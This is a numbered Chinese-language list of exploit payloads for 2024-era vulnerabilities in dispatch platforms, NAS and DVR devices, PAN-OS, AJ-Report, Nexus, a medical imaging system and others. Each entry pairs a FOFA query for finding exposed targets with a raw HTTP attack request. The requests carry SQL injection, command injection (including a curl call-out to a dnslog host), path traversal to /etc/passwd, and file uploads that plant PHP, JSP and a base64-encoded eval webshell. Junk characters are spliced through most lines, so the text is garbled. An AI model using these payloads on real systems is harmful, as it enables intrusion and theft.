FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 e+ V5 B, c! a9 B
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
U8 x; ?! j* s# v, SHost: x.x.x.x6 Q+ ~6 \8 ~7 {8 X0 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 M" E& H1 `4 c5 {: k0 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 v; i4 ?1 l' V1 q; Y. KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! W$ _7 q; X Q& }) N
Accept-Encoding: gzip, deflate, br2 f8 \! e9 R* H( ~
Connection: close+ N. ?$ {0 a1 \& r' `5 G$ P( c) k) @# }
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk2 r$ k7 x* o7 [) f9 i
Upgrade-Insecure-Requests: 1: i+ k U9 O9 E6 E3 {/ k5 [* h
\4 U: T7 X* @9 |3 p' j
8 |3 {( B. m! S) f( G4 d! T
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
9 n% H; v! {$ b# I8 P% wCVE-2024-2566
8 E% B3 e9 E7 L9 M) { OFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; c$ E8 q& J; }1 M4 K4 ?& ^* XGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
- _' @- d3 W1 fHost: x.x.x.x
& h4 V' [0 C' q. @) J G7 p+ NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 a: l9 E& e# _# W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- v8 a1 g v4 I9 F9 ~. A gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! o* J7 D, Q: W
Accept-Encoding: gzip, deflate, br
; C7 T8 U4 j) y4 q% _Connection: close
4 V1 y$ [, e- |3 h3 _Cookie: authcode=h8g98 X+ g. |$ M' T
Upgrade-Insecure-Requests: 1
: {* t& D' p; C# j
) t$ q+ e' T4 S- ^. \
4 d: j( b: t( j$ w8 F1 ?( S2 t141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
% x6 C# N5 n# B! KFOFA:body="指挥调度管理平台"$ M) _/ A) p) |4 S7 K- I2 d
POST /app/ext/ajax_users.php HTTP/1.1& c, _- ^- {3 A, K5 V1 H+ g& t) u% u
Host: your-ip! ?- I. v0 E& y, m
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
* c6 I: e' x0 q5 mContent-Type: application/x-www-form-urlencoded8 c7 M0 L. H( i) J( L3 x
; I4 s+ Y* |! U
t% Z' S# }! M" }" _0 T
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -# X: z- @( n. g9 w
. F. M* m% G5 w# I; G8 P
' C7 V+ M/ K2 E
142. CMSV6车辆监控平台系统中存在弱密码* b0 g9 p# [7 ]$ T8 m5 E
CVE-2024-29666) ?2 C1 k4 Q( P3 B% b
FOFA:body="/808gps/"3 Q; J/ x" K& {/ ~9 w/ _5 _
admin/admin/ g% l2 y+ D# c1 C/ i; O
143. Netis WF2780 v2.1.40144 远程命令执行3 F% h( N* Y' i- Z b
CVE-2024-25850) t5 L( V, A; b+ A& u
FOFA:title='AP setup' && header='netis'/ G) B+ g- X! N7 W1 t9 o
PAYLOAD
2 v& s2 ~" n' N9 y9 j2 [7 L$ w6 R' K# ^* s
144. D-Link nas_sharing.cgi 命令注入4 X: Z3 l8 g1 B7 h/ R P
FOFA:app="D_Link-DNS-ShareCenter", b4 d6 ]) g. ^ q& @- b* t" L! t- I' V
system参数用于传要执行的命令- g% a; O. S9 o1 k u; t" \; H
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
2 ^3 E+ x& o- n% |( EHost: x.x.x.x
8 X m+ @$ |2 E5 ?& H( [User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0# V0 c' e# b+ r; v9 t- {" ?8 F
Connection: close
& I" F$ l6 Q, c9 C% @Accept: */*
( q6 v6 t8 |: m# I/ JAccept-Language: en
1 o2 ^. R) x) u% uAccept-Encoding: gzip+ r3 c, L7 p3 [, N! V. w- V2 `: R: N& m
) Y- s! d0 b6 Z. x6 l
3 Y% `: p5 W7 a
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入3 b+ ~7 H$ F2 |" o+ L: k
CVE-2024-3400
" y$ O9 u0 u# n7 h$ c% HFOFA:icon_hash="-631559155"
+ ?% ]1 x+ H' Q! {. }; r5 ]& vGET /global-protect/login.esp HTTP/1.1) y, f0 o5 I* J) ]9 k# E
Host: 192.168.30.112:1005
$ A8 }4 j# P/ a+ ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
8 w4 p; R/ E& [) r6 |5 u4 b4 uConnection: close
6 \8 W8 O9 f# S' ZCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
. w+ M/ `) p9 n8 y6 ZAccept-Encoding: gzip/ _6 R+ D1 a- x# O4 ]! d3 G1 U; z, W
2 z1 ^% M) U# Z) P% f) l! C M
( x2 _/ z d5 ^' u146. MajorDoMo thumb.php 未授权远程代码执行0 M8 h. g/ K3 \5 ]; ]2 F; Y
CNVD-2024-02175; U% \- a, v) w6 v% U( n) Q
FOFA:app="MajordomoSL"
; F% o, Z! \! L% {GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1% m9 G; x. X! k7 X( t _
Host: x.x.x.x
7 X( t1 l; O; \7 Z: B1 P. Z" {* OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84# k$ i" @$ E" g2 ?1 f
Accept-Charset: utf-8 k' W# k: O" Z+ @$ G9 _3 ~
Accept-Encoding: gzip, deflate
5 U& d7 O+ ~- C9 m; H& EConnection: close
$ X8 v, L {5 f# c7 |; W' T+ E2 E* _0 a$ v
2 o$ y3 \6 T! B) s4 m/ t' L! a
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
8 X4 P; e2 l; G4 A% g- N) |CVE-2024-32399, A& M' f0 l: G& S5 Z" B0 ~& \+ r% O
FOFA:body="RaidenMAILD"" S. j8 v E& c2 p# |: o2 m" O
GET /webeditor/../../../windows/win.ini HTTP/1.1
. c% D: F- F1 k/ f# ]2 N% yHost: 127.0.0.1:81; U# F; }1 h9 a' r7 s+ j
Cache-Control: max-age=06 U% e9 ~1 r1 x' w2 P
Connection: close+ n7 E! E1 z, G/ D9 E
' C# J' E- m' G9 @1 P
# L9 c! s, I5 z4 ?" W4 O148. CrushFTP 认证绕过模板注入; f# R( W/ a% j$ U: q
CVE-2024-4040- E- _0 L* f1 j( j5 e
FOFA:body="CrushFTP"- {$ b% ?# d9 ?5 c# x( O3 Y
PAYLOAD& p" K, `; x$ m3 w* A( y5 R
% X6 J: V/ [8 G0 q' ^5 }: V149. AJ-Report开源数据大屏存在远程命令执行& _3 q- V' ~2 k4 c% T5 `3 a
FOFA:title="AJ-Report"3 ]; r, l+ D. K9 [2 g& A+ z8 U/ w
9 @! w: K7 ` P8 W3 |8 Q* F" L3 I8 APOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
% F: s# M4 f( W) p$ \; z1 vHost: x.x.x.x
* x/ g. d, j) i. fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ X5 C; G' |) V" XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) a) G; ]7 d" u. W( ]6 g. w1 p# Y, g
Accept-Encoding: gzip, deflate, br
7 C8 [- r8 b i* u7 S2 |Accept-Language: zh-CN,zh;q=0.9
3 G* [5 X3 V! T5 [; CContent-Type: application/json;charset=UTF-8
. V1 r3 O3 g2 M% E. j6 WConnection: close1 k" w0 K, u. ]
A* Q1 q$ W' T
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}( |- ]; T) X N" W9 z) ^+ T
: `2 Q0 y& p, I5 j6 X, }& Q
150. AJ-Report 1.4.0 认证绕过与远程代码执行2 T' o. w$ k$ E r! D. X% ^! n
FOFA:title="AJ-Report"6 k8 K* X; g! t
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1) ?/ N! Q2 |9 t
Host: x.x.x.x
4 _' T7 K' H5 {$ X( V$ L. r6 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 m1 ?7 t$ O* c1 P4 O o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. `, [+ T @5 n% s$ f
Accept-Encoding: gzip, deflate, br% S5 W3 M8 \# q: H# \
Accept-Language: zh-CN,zh;q=0.9 |1 j% b {& Q: {3 T; q( N
Content-Type: application/json;charset=UTF-8
7 P$ B) _* a5 t; P* sConnection: close
) f K! Q: j1 j; \7 o9 lContent-Length: 339, B7 a, n* \4 z( j
7 n; `/ [+ p# ~$ q$ i
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
4 r" y) }. B. M/ x* r) b" C4 _
2 j7 N4 i, V/ p) Y
, |) K: _% \/ T6 [151. AJ-Report 1.4.1 pageList sql注入5 Y6 g5 \" {7 R. |1 [
FOFA:title="AJ-Report"
b+ h5 _$ B e" a, [% ~GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
% Y/ f$ X/ a# j" F0 o+ LHost: x.x.x.x( X: h, d4 w' I6 w, o+ |5 |3 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 A! @8 X2 w& q- q9 U4 [3 L
Connection: close8 ]' d' h6 q) c5 Y! ^! T
Accept-Encoding: gzip
% E2 ~& Y, O! `0 i3 n* A+ p* b+ `8 J, t( z/ ~
, v- w) I; O: N+ m' Z2 e) K$ K
152. Progress Kemp LoadMaster 远程命令执行$ W; G! B% \! ]4 H
CVE-2024-1212, r/ S( Q) f% q4 A1 h. ~
LoadMaster <= 7.2.59.2 (GA) \. g2 a. e( [5 o4 ~8 P
LoadMaster<=7.2.54.8 (LTSF)
: E: C3 M9 p; W# D5 h Q, r& TLoadMaster <= 7.2.48.10 (LTS)
: V3 e% r& ^/ ?: ~/ UFOFA:body="LoadMaster"# k. J# I+ }, w2 v- G
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码9 y- x7 z" Q" b: ~1 `1 F, K8 S
GET /access/set?param=enableapi&value=1 HTTP/1.1
9 {) }% D6 I# A* I! a0 hHost: x.x.x.x1 G" V# e5 a; v5 _- m% ^; v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
3 L( F# q3 _ ~5 T/ _2 DConnection: close, x s: |! h- \
Accept: */*
( q/ e- i2 N+ s" Y3 ]$ I" f" v1 JAccept-Language: en- L1 G9 S9 w3 K2 _' I1 y& ^. W
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
. \* W- x' D, H3 V8 F* C& n BAccept-Encoding: gzip+ G7 a2 G, ^6 I- _7 C5 u
& C( B! ?( Y8 E9 W$ C8 S+ `7 [. D
% ^; ^$ I5 r! k153. gradio任意文件读取% I8 I! d7 \$ C& F" S
CVE-2024-1561FOFA:body="__gradio_mode__"
% V# {5 R. p0 t/ f6 V第一步,请求/config文件获取componets的id/ g9 \: { S( C! M, D2 ~
http://x.x.x.x/config) q7 I* f: E, Z% \/ w
+ d- K; @, H/ `. d9 {8 t5 C6 O- ~/ Z
0 Z! f- F' Y) Z$ x8 z a! ^第二步,将/etc/passwd的内容写入到一个临时文件; s3 q4 j: T7 z* Q, j& ~5 {
POST /component_server HTTP/1.1! W" D( g& T- ]6 Q& o0 N
Host: x.x.x.x( _5 W' ]8 K# J* h {8 H. S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
8 I9 A0 }9 u& o9 OConnection: close6 G3 X' t2 x1 m% T" a$ |) K
Content-Length: 115& g# @& N' z, f9 |6 a8 x
Content-Type: application/json
9 D/ Y7 b6 J; B) t* e, dAccept-Encoding: gzip
2 E: r& G( f1 D0 j1 _) u- j ~
3 Z5 |; p/ a' ~" j/ x) a{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
m0 b& A( ]' z+ k) Z3 A, J
" Z3 g' O- x, _( c- a/ @- b4 V# d! ]
2 R4 e. ~( d" D7 V u" {第三步访问
2 Y" P2 t# y: f1 Uhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd/ P$ m; e2 m) E) R- M/ o+ P6 k
! b' s( [* I/ F1 N$ `6 `9 @8 k1 `; H! v
154. 天维尔消防救援作战调度平台 SQL注入; Y4 H. m& T m6 U; Y7 F
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"% P9 K' u6 E* t6 T2 r
POST /twms-service-mfs/mfsNotice/page HTTP/1.1/ U _" X, \9 X, l% A% k
Host: x.x.x.x3 i. ~2 d4 w2 {" l- [- _% u
Content-Length: 106* e* w' h) Z5 u. _4 C$ e
Cache-Control: max-age=03 ^. B: U; n+ c, p' a- a5 U1 k
Upgrade-Insecure-Requests: 1* Z8 L' d; Q. w" M9 o b- P
Origin: http://x.x.x.x
" d- r6 p7 i3 l JContent-Type: application/json3 Z4 d7 i; b% O6 M. c2 L- x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" ?% z! f. j0 s( T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# _; }. g- B4 V1 L( FReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page* P* a+ }! _" }# A/ Y1 c% q/ o
Accept-Encoding: gzip, deflate( D" J( Q/ \# U! d3 n
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
8 i/ Z& S2 a" c8 `Connection: close
8 M/ t2 V0 G% P5 z- u2 O4 M, N' H
/ f0 |+ @2 ` l0 A{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}+ M ^8 V# M/ F& A) h
2 R6 x! k1 H: p A1 i2 r! s9 u* e! n. U3 w l) }, y) B& w
155. 六零导航页 file.php 任意文件上传
( J& K0 E7 H* |2 M+ oCVE-2024-34982
+ {) S- G' V) R+ e0 Q% |) ?8 U. TFOFA:title=="上网导航 - LyLme Spage"
+ i0 l, w4 I! n s+ rPOST /include/file.php HTTP/1.19 ]4 G5 l# ?% x* ~. c
Host: x.x.x.x% O1 }* l' }( }$ s6 x; y7 a$ I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
1 M. S, `1 {( `: yConnection: close
% D; J/ f& ^' N3 S+ K& RContent-Length: 2328 o; c- O0 [7 {! q4 n
Accept: application/json, text/javascript, */*; q=0.01" P% B' ^, Z4 e5 M
Accept-Encoding: gzip, deflate, br& C, [) ^9 d; M @8 Y3 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 a* I: {- [( [% Z
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
1 y2 [' V+ K O. S6 m2 u$ b2 t( u9 jX-Requested-With: XMLHttpRequest
& P, J- F7 q1 R# p8 G# u! C7 I8 j: H2 t; p+ C
-----------------------------qttl7vemrsold314zg0f6 i1 L3 Q, w$ X5 w" P# I. P8 t: t
Content-Disposition: form-data; name="file"; filename="test.php"
: u( i6 V3 }# HContent-Type: image/png
, ~ t ~9 r, v& g
. X0 S, T. q+ C5 p- a+ I<?php phpinfo();unlink(__FILE__);?>
. i X( w% m4 [! x: q$ K-----------------------------qttl7vemrsold314zg0f--
0 F3 a1 H3 h1 J, ?- P; v9 b7 p _7 b `, [( x |; }
6 @; Z& ?* Z5 W/ ?- O3 z
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
- k6 k$ b# i; b9 C6 n4 }* [* {# ^+ _& Y5 j
156. TBK DVR-4104/DVR-4216 操作系统命令注入9 F: P2 @' J }) \# _, T
CVE-2024-37212 x/ W+ z. O5 g8 f$ W4 s$ s- [. G9 Z
FOFA:"Location: /login.rsp"
9 V5 I2 u! d" @9 U9 h1 Q·TBK DVR-4104) e5 m7 S* F% z, {5 n/ j
·TBK DVR-42169 p8 V" J+ T( | d3 R& |
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
& q6 L% x4 c; W
& B7 U' t6 b3 j7 v5 C! m" G6 I
7 Q: \/ R L Z# }; c' kPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
0 X) t1 |% ^# S" K( q/ q* _1 sHost: x.x.x.x9 w- _3 C" Z& W" x0 K5 C6 i6 H
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, j' m* X( z8 ?) F4 Y6 U
Connection: close( H3 Z8 Y" l6 A) o( \
Content-Length: 03 K) h: |/ ^8 ?/ z4 H
Cookie: uid=1
2 e% J/ b T: \5 Y4 UAccept-Encoding: gzip6 b( x& k7 l9 v9 C/ f
P" [0 M, x# Z" E. _% w
2 ^9 }+ O2 e5 H* Y157. 美特CRM upload.jsp 任意文件上传. W! ?! L0 d# u9 Z
CNVD-2023-06971+ d& Y2 M s; a2 ]- \2 }$ n# B
FOFA:body="/common/scripts/basic.js"2 M# f* j1 j; t5 R( G6 Q
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
! W- y2 D: W, \1 D/ rHost: x.x.x.x
' K* z1 B. L+ P8 I* r. [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
, {; G9 \. e7 x# {& [1 T5 o7 gContent-Length: 709
7 n" U; W2 ~4 @ u% |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, [6 I: x! A# `3 H
Accept-Encoding: gzip, deflate$ |: D b. \0 n. h( T/ i4 }
Accept-Language: zh-CN,zh;q=0.9' Z2 L( b, u" T% ~0 z6 {" Q+ Y1 ^& M
Cache-Control: max-age=0. i: S7 g' N: W; N, N! k6 t" ?# L. u
Connection: close* a: O. Z3 n" H6 I( f0 `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN }3 f$ j9 e3 @3 U9 O2 V
Upgrade-Insecure-Requests: 18 c" b& r. k# j. q4 b
5 s' ?; e2 Q: S0 L0 m; ?) c; }, P------WebKitFormBoundary1imovELzPsfzp5dN: B o5 @, e. @# Y
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp": i" E2 J$ R# R8 L& g8 d4 ^* ^" r/ L
Content-Type: application/octet-stream
( s3 P+ C8 }! {* H8 |1 d# c, I i( Q l0 l
nyhelxrutzwhrsvsrafb
; R1 [+ _2 c; @* u& I------WebKitFormBoundary1imovELzPsfzp5dN5 s5 Y6 r- D5 x9 ^) P
Content-Disposition: form-data; name="key". x6 ^. o w% s1 R) A; Q, B
}* j- W1 A! U1 v
null! _: n3 }7 m5 d+ J- u
------WebKitFormBoundary1imovELzPsfzp5dN
2 J3 s* v9 {8 XContent-Disposition: form-data; name="form"
3 u! R/ P+ b( ^6 i. v& r* d
$ l9 a7 P2 E0 J# K+ tnull. b4 x& J& j3 a1 p; {$ C
------WebKitFormBoundary1imovELzPsfzp5dN: K3 c6 Z- A% h+ ~
Content-Disposition: form-data; name="field"- l0 |) k z/ Z# ~0 E b5 E
M/ u% |$ P; t5 a, Rnull
$ U/ [, C) a- ^ M/ s------WebKitFormBoundary1imovELzPsfzp5dN
X2 D; _8 u# }/ [! ZContent-Disposition: form-data; name="filetitile"
h$ p+ W! A% o$ _& o& s! f
4 d+ V/ K; n h1 Hnull
* f4 D8 V9 O6 E( Y------WebKitFormBoundary1imovELzPsfzp5dN: g( P; Z8 i: \7 V# A
Content-Disposition: form-data; name="filefolder"
) Y2 z! p* X& i* e* H$ ?7 X$ S: w% n8 r2 E3 H$ g
null) x8 q$ n$ j" w+ J' z6 Q6 G
------WebKitFormBoundary1imovELzPsfzp5dN--
; ?: m8 a3 P m) G* a2 m& Q5 F* q! ]; c5 ?; k' M9 G
% q3 T7 V8 ^9 {# C2 P# V' G, }* Rhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
- W& W& X8 u& @# W: p" \+ O- [9 c2 g- w# o8 }1 P7 \# Z
158. Mura-CMS-processAsyncObject存在SQL注入
1 U9 h5 A4 {: [( `& |9 `CVE-2024-32640 Q3 [8 {4 }4 m: r: }
FOFA:"Generator: Masa CMS"
8 j/ p, q& w/ r; H; w: t6 `POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.16 ^7 X- s: z( j3 ?1 a' P% W
Host: {{Hostname}}% D' x" E! W4 m# z3 L2 f
Content-Type: application/x-www-form-urlencoded
3 T$ F- ?5 j: |1 K& w8 g n# I
4 `3 w/ y; s8 r. j3 p: x8 Eobject=displayregion&contenthistid=x\'&previewid=1
5 a, S' Q- }! X7 P
5 c) W9 i* K6 I9 U3 X/ Q' ?
7 W: }5 Y. N; M& \159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
4 }; h9 x$ B) y; O: ~9 TFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")9 v* f: r& q" j
POST /webservices/WebJobUpload.asmx HTTP/1.1
5 B" q9 n+ D4 j+ P: rHost: x.x.x.x
$ h# U, O+ F2 l0 f% jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
3 [/ u" x% p, G0 c) `Content-Length: 1080: F! l+ G' H' t, h" z# X
Accept-Encoding: gzip, deflate
2 E& O! V F' P1 VConnection: close
* @! F5 i: }# H* H; z/ xContent-Type: text/xml; charset=utf-85 w5 ^4 C2 \% [0 i& ?6 n& H
Soapaction: "http://rainier/jobUpload"
" b" `% O1 x& Z- N6 j( u* Z' J
* [+ P. k& ?) c0 v4 W' Q<?xml version="1.0" encoding="utf-8"?>- d& \6 r9 r4 q
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+ I! o; u* R2 o" E! f0 d<soap:Body>4 G3 j, Z) x- h
<jobUpload xmlns="http://rainier">, V( W' V9 k5 N/ C8 _
<vcode>1</vcode>) W( e$ s u* e7 [5 I3 ~; \
<subFolder></subFolder>
' j; |; |# e8 h3 I4 n<fileName>abcrce.asmx</fileName>
$ N5 w3 g$ _5 v<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
2 X- l/ ?( E# W1 ^</jobUpload>) K- S3 l0 ^$ V0 U: o, e$ T
</soap:Body>4 n* a8 b9 {2 F4 s& J9 k, N
</soap:Envelope>, L% G( j& ^* Q( \. V
" \0 v0 \- ?2 Q9 j S) E, [. t; m9 \
& l& c: S6 a& p, M! Q/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")* j7 U' B9 {4 {/ H
: s( ]8 w, c8 e) }# @
+ N( @# D- S9 D
160. Sonatype Nexus Repository 3目录遍历与文件读取/ B* J) S) y. W
CVE-2024-4956 E& u( g% I# W1 ?) z X, _+ @
FOFA:title="Nexus Repository Manager"
' [; u. i1 w& J- ~1 O# T" SGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1* [5 A# A9 u8 R5 i. F* n
Host: x.x.x.x
6 x# u" s3 E$ A% A- M, J% }# ^' h0 KUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.08 c* K. A2 g* [. u) Z+ ]
Connection: close
1 ]% W4 }: `/ @3 }Accept: */*
+ v# z& Q" m$ K5 @Accept-Language: en
7 _! Z% E3 ^! @* i. DAccept-Encoding: gzip
5 i5 k" F3 a7 k- [* Q# S) T0 I0 C$ Y3 [- y1 @
2 [# Z$ I% q9 L161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传2 j0 K, N3 _3 K4 i
FOFA:body="/KT_Css/qd_defaul.css"
# Z1 {9 J5 N7 J第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密: x' A0 \8 U* I$ b# D6 z1 c
POST /Webservice.asmx HTTP/1.1" P& G Y2 g7 O6 @
Host: x.x.x.x7 ^# r3 c* q& |3 t, W! \- S& Z0 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
9 T7 g4 E/ s5 m5 Z/ KConnection: close
; V; | g) W2 z5 j4 R. O) FContent-Length: 4459 F/ G5 ]$ @; B$ Z% U
Content-Type: text/xml2 W% F2 J% p+ U9 |3 |
Accept-Encoding: gzip- v# l- ]/ e! _5 ]3 o) C4 t3 _! L
6 }* U3 \8 R. C
<?xml version="1.0" encoding="utf-8"?>
1 J3 ^1 T, P' a4 h9 |<soap:Envelope xmlns:xsi="
8 ^( `+ _+ a& Dhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"0 y, W) ?$ |3 s0 }3 _* O7 o+ n
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
